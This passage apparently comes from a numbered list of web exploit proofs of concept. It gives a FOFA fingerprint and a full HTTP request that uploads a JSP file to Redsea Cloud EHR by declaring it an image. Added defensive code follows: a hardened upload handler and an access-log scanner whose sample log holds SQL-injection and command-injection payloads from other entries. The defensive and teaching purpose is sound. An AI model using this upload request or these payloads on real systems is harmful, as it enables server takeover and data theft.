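Content-Length is computed from the serialised body rather than typed by hand, which is the usual reason a manually edited multipart POC fails against an IIS front end.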
203. Redsea Cloud (红海云) EHR PtFjk File Upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

The part is declared image/jpeg while the filename keeps its .jsp extension: the declared type is there to satisfy a check that looks at Content-Type rather than at the extension or the bytes. (Content-Length 210 is exact for the body as written, including the CRLF line endings.)
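Entries 192, 194 and 203 succeed for three different reasons: the stored name comes from a query parameter (192), a ../ sequence in the multipart filename is honoured (194), and a .jsp is accepted because the part claims to be image/jpeg (203). The code below is an added example, not code from any of those products, showing the write pattern those POCs rely on beside a hardened version that defeats all three. The upload directory, the extension allow-list and the magic-byte table are assumptions chosen for the example.

```python
"""Upload handling: the pattern behind entries 192/194/203 beside a hardened version.
Added example with an assumed upload directory and allow-list; not vendor code."""
import hashlib
import os
import posixpath
import re
from dataclasses import dataclass

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}
# Leading bytes we accept per extension; the client's Content-Type (entry 203 sends
# image/jpeg for a .jsp) is never consulted.
MAGIC = [
    (b"\xff\xd8\xff", {".jpg", ".jpeg"}),
    (b"\x89PNG\r\n\x1a\n", {".png"}),
    (b"GIF87a", {".gif"}),
    (b"GIF89a", {".gif"}),
    (b"%PDF-", {".pdf"}),
]
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")


@dataclass
class Upload:
    filename: str       # from the multipart part (or, as in entry 192, a query parameter)
    declared_type: str  # client-supplied Content-Type of the part
    data: bytes


class RejectedUpload(ValueError):
    pass


def vulnerable_store(upload, upload_dir):
    """The behaviour the three POCs rely on: the client name is joined to the directory
    and used as-is, so '../' escapes upload_dir and any extension (.ashx, .jsp) survives."""
    return os.path.join(upload_dir, upload.filename)


def sniff_extensions(data):
    """Extensions consistent with the file's leading bytes, or an empty set if unknown."""
    for magic, exts in MAGIC:
        if data.startswith(magic):
            return exts
    return set()


def hardened_store(upload, upload_dir):
    """Return the path the file may be written to, or raise RejectedUpload.

    1. Only the basename of the client name is considered, so traversal cannot leave upload_dir.
    2. The extension must be on the allow-list; only the last suffix counts and the name must
       match SAFE_NAME, so '.ashx', 'x.jsp' and 'x.jpg.jsp' are all rejected.
    3. The content must start with magic bytes matching that extension; declared_type is ignored.
    4. The stored name is derived from the content hash, so the client never chooses it.
    """
    base = posixpath.basename(upload.filename.replace("\\", "/"))
    if not SAFE_NAME.match(base):
        raise RejectedUpload("unacceptable filename: %r" % upload.filename)
    ext = posixpath.splitext(base)[1].lower()
    if ext not in ALLOWED_EXT:
        raise RejectedUpload("extension not allowed: %s" % ext)
    if ext not in sniff_extensions(upload.data):
        raise RejectedUpload("content does not match %s" % ext)
    stored = hashlib.sha256(upload.data).hexdigest()[:16] + ext
    root = os.path.realpath(upload_dir)
    path = os.path.realpath(os.path.join(root, stored))
    if os.path.dirname(path) != root:  # cannot fail after the checks above; kept as a final guard
        raise RejectedUpload("path escaped upload directory")
    return path
```

Serving the directory with script execution disabled (no JSP/ASPX/PHP handler mapped under the upload root) is the second half of the fix; the checks above keep hostile names and content out, the server configuration makes a slip harmless.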
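For defenders, the quickest use of this list is a look back through web access logs for the request shapes above. The scanner below is an added example (not part of the original article) that decodes each request line once and matches it against rules derived from the entries in this section whose payload is visible in the URL; body-only payloads such as entry 191's POST parameter cannot be seen in an access log, so for those only the endpoint itself can be flagged. The log lines are constructed for the example, and a match is an indicator, not proof of compromise: the response code and size on the matched line still need to be checked.

```python
"""Access-log sweep for the request shapes in entries 189-203 (added example, constructed log)."""
import re
import urllib.parse

# (entry, description, required method or None, pattern over the decoded "path?query")
RULES = [
    (189, "deleteStudy time-based SQLi", None, r"^/xds/deleteStudy\.php\?.*waitfor\s+delay"),
    (191, "NavigationAjax reached via /js/../", None, r"^/CDGServer3/.*\.\./NavigationAjax"),
    (192, "UploadEmailAttr with handler extension", "POST",
     r"^/JoinfApp/EMail/UploadEmailAttr\?.*name=[^&]*\.(ashx|aspx|asmx)"),
    (193, "setSystemTimeAction command execution", "POST", r"^/master/ajaxActions/setSystemTimeAction\.php"),
    (194, "uploadAttachmentServlet upload", "POST", r"^/servlet/uploadAttachmentServlet"),
    (195, "send_order.cgi operation", "POST", r"^/send_order\.cgi\?parameter=operation"),
    (196, "resetPasswordBySuper", "POST", r"^/cas/userCtl/resetPasswordBySuper"),
    (197, "Quotegask_editAction UNION", None, r"Quotegask_editAction\.entweb;\.js\?.*union\s+all\s+select"),
    (198, "aliyundrive-webdav sid shell metacharacters", None,
     r"^/cgi-bin/luci/admin/services/aliyundrive-webdav/query\?.*sid=[^&]*[`$;|]"),
    (200, "dmku sleep() SQLi", None, r"/dmplayer/dmku/\?.*sleep\("),
    (201, "binary.do SQLi endpoint", "POST", r"^/newsedit/newsplan/task/binary\.do"),
    (203, "PtFjk.mob upload", "POST", r"^/RedseaPlatform/PtFjk\.mob\?method=upload"),
]
COMPILED = [(e, d, m, re.compile(p, re.IGNORECASE)) for e, d, m, p in RULES]

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status bytes ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) (\S+)')


def scan_line(line):
    """Return the list of (entry, description) rules a single log line matches."""
    m = LINE.match(line)
    if not m:
        return []
    method, target = m.group(3), m.group(4)
    decoded = urllib.parse.unquote_plus(target)  # one decode pass, matching the page's %-encoded payloads
    return [(e, d) for e, d, need, rx in COMPILED
            if (need is None or need == method) and rx.search(decoded)]


def scan(log_text):
    """Return one finding dict per (line, rule) match, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        for entry, desc in scan_line(line):
            findings.append({"ip": m.group(1), "time": m.group(2), "method": m.group(3),
                             "target": m.group(4), "status": int(m.group(5)),
                             "entry": entry, "rule": desc})
    return findings


# Constructed sample log: five requests that mirror POCs above, then two benign ones.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:01:02 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2024:10:01:09 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.7 - - [12/May/2024:10:02:11 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60ls%20/%3E/www/aaa.txt%60%20 HTTP/1.1" 200 60 "-" "curl/8.0"
10.0.0.7 - - [12/May/2024:10:02:40 +0800] "POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1" 200 33 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2024:10:03:00 +0800] "POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2024:10:03:30 +0800] "GET /xds/deleteStudy.php?documentUniqueId=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.3 - - [12/May/2024:10:04:00 +0800] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("%(time)s %(ip)s entry %(entry)s (%(rule)s) %(method)s %(target)s -> %(status)s" % f)
```

The endpoint-only rules (193, 194, 196, 201, 203) will also fire on legitimate use of those features; correlate on source IP, user agent and a burst of distinct fingerprints from one address, which is what an Nday sweep looks like in practice.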